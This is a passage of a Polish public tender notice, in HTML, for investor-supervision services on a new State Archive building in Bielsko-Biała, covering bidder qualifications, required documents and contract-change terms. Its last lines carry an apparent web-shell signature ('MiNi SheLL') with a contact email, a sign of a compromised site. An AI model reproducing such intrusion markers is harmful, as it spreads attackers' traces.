o 	informacje o postępie rzeczowym i finansowym robót (w okresie raportowanym i narastająco) jw. i o jego zgodności z pierwszym przyjętym Harmonogramem rzeczowo - finansowym,
o	 opis robót i dostaw zrealizowanych przez Wykonawcę Robót w raportowanym okresie,
o 	analizę (w tym informację procentową) wykonania rzeczowego za okres raportowany a także za okresy skumulowane do bieżącej daty,
o 	faktury, oświadczenia i rozliczenia Wykonawcy Robót,
o 	opis działań prewencyjnych i korekcyjnych (jeżeli takie wystąpią )
o 	wszelkie niezbędne załączniki (np. notatki ze spotkań, wykonane opinie).
Zamawiający, w terminie 14 dni od daty otrzymania Raportu, powiadomi Koordynatora Zespołu o
zatwierdzeniu lub odrzuceniu Raportu z podaniem przyczyn odrzucenia.

Powyższe wyliczenie ma charakter jedynie przykładowy, zaś Wykonawca zobowiązany jest do świadczenia usług nadzoru inwestorskiego objętych niniejszym zamówieniem publicznym w zakresie i w sposób wymagany w szczególności acz nie wyłącznie, właściwymi przepisami prawa oraz postanowieniami umowy o wykonanie zamówienia publicznego zawartej pomiędzy Wykonawcą a Zamawiającym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.63.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem stanowiącym Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem stanowiącym Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem stanowiącym Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia publicznego mogą się ubiegać Wykonawcy, którzy mają w swojej dyspozycji następujące osoby o odpowiednich kwalifikacjach, zdolne do wykonania zamówienia publicznego objęte niniejszym postępowaniem:

1	inspektora nadzoru budowlanego posiadającego uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń wydane na podstawie aktualnie obowiązujących przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity z dnia 12 listopada 2010 r. (Dz.U. Nr 243, poz. 1623) z późn. zm.) (niżej ustawa Prawo budowlane) oraz przepisów wykonawczych wydanych na podstawie wskazanej ustawy, lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do nadzorowania robót konstrukcyjno - budowlanych tożsame z tymi objętymi przedmiotowym zamówieniem, oraz minimum 5 - letni staż pracy na stanowisku inspektora nadzoru inwestorskiego,
2	inspektora nadzoru w zakresie instalacji sanitarnych posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane oraz przepisów wykonawczych wydanych na podstawie wskazanej ustawy, lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do nadzorowania robót sanitarnych objętymi przedmiotowym zamówieniem, oraz minimum 5 - letni staż pracy na stanowisku inspektora nadzoru inwestorskiego,
3	inspektora nadzoru w zakresie robót elektrycznych posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane oraz przepisów wykonawczych wydanych na podstawie wskazanej ustawy, lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do nadzorowania robót elektrycznych objętych przedmiotowym zamówieniem, oraz minimum 5 - letni staż pracy na stanowisku inspektora nadzoru inwestorskiego.

Osobami na stanowiska wskazane powyżej mogą być obywatele państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z art. 12a ustawy Prawo budowlane oraz zgodnie z regulaminem postępowania w sprawie uznania kwalifikacji zawodowych w budownictwie w Polsce osób z państw Europejskich Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem stanowiącym Załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy prawo zamówień publicznych, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności: 
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z brzmieniem przepisu art. 144 ust. 1 ustawy Prawo zamówień publicznych zakazuje się istotnych zmian postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany. W wykonaniu powyższej dyspozycji Zamawiający poniżej przewiduje w treści SIWZ możliwości dokonania zmiany postanowień umowy w sprawie zamówienia publicznego w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
Zmiana terminu wykonania umowy: 
1 	wystąpienie okoliczności siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą Stron, występujące po podpisaniu umowy o wykonanie zamówienia publicznego, a powodujące niemożliwość wywiązania się przez jedną lub obie Strony z postanowień umowy w jej obecnym brzmieniu, w ustalonym umową pierwotnym terminie;
2	skrócenia terminu realizacji zamówienia publicznego w związku z koniecznością jego zakończenia w danym roku budżetowym lub w związku z upływem terminu złożenia wniosku o uzyskanie środków przyznanych na realizację zamówienia;
3 	zmiany terminu wykonania zamówienia publicznego w sytuacji, kiedy budowa nowego obiektu Archiwum Państwowego w Katowicach Oddział w Bielsku-Białej nie zostanie zakończona lub nie może być kontynuowana z powodów  określonych w punkcie 3.3. SIWZ;
 4 	przekroczenie zakreślonych przez prawo terminów  wydawania  przez organ  administracji  decyzji, zezwoleń, itp.,
Zmiany osobowe: 
1 	zmiana Podwykonawcy lub innej osoby, przy pomocy którego Wykonawca wykonuje przedmiot umowy (członka Zespołu Nadzoru, o którym mowa we wzorze umowy o wykonane zamówienia publicznego, której wzór stanowi Załącznik nr 8 do  SIWZ), na innego Podwykonawcę  lub inną osobę, dysponującego/dysponującą co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym co uprzedni Podwykonawca/uprzednia osoba; 
Pozostałe zmiany: 
1 	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy w sprawie zamówienia publicznego oraz w konsekwencji zmniejszenie ceny kontraktowej objętej ofertą Wykonawcy, która została uznana za najkorzystniejszą, w przypadku wstrzymania lub ograniczenia finansowania zamówienia publicznego lub w przypadku wystąpienia po stronie Zamawiającego innych okoliczności, o których mowa w pkt. 2 poniżej; w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie stosownie pomniejszone przy czym Zamawiający zapłaci za wszystkie spełnione należycie przez Wykonawcę świadczenia; 
2 	inne niż wymieniona w pkt. 1 powyżej siła wyższa zdarzenie zewnętrzne, niemożliwe do przewidzenia i do zapobieżenia uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ oraz umową zawartą w sprawie zamówienia publicznego;
3	zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, powodujących konieczność dostosowania dokumentacji objętej niniejszym zamówieniem publicznym, do takiej zmiany, które nastąpiły w trakcie wykonania umowy w sprawie zamówienia publicznego;
4	zmiany wysokości należnego podatku od towarów i usług VAT na skutek zmian w bezwzględnie obowiązujących przepisach prawa,
5 	obniżenie wysokości wynagrodzenia na skutek wadliwego wykonania przez Wykonawcę przedmiotu zamówienia publicznego,
6 	inna niż przewidziane w punktach powyżej - zamian umowy korzystna dla Zamawiającego, w szczególności, acz nie wyłącznie, w zakresie dokonywania płatności.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego) oraz zmiany oznaczeń Stron, w tym firmy, zmiany adresu, siedziby, danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ap.gov.pl/katowice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Archiwum Państwowe w Katowicach, ul. Józefowska 104, 40 - 145 Katowice w Sekretariacie, pok. 107, Budynek nr 1, (I piętro) od godz. 8.00 do 14.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Archiwum Państwowe w Katowicach, ul. Józefowska 104, 40 - 145 Katowice w Sekretariacie, pok. 107, Budynek nr 1, (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com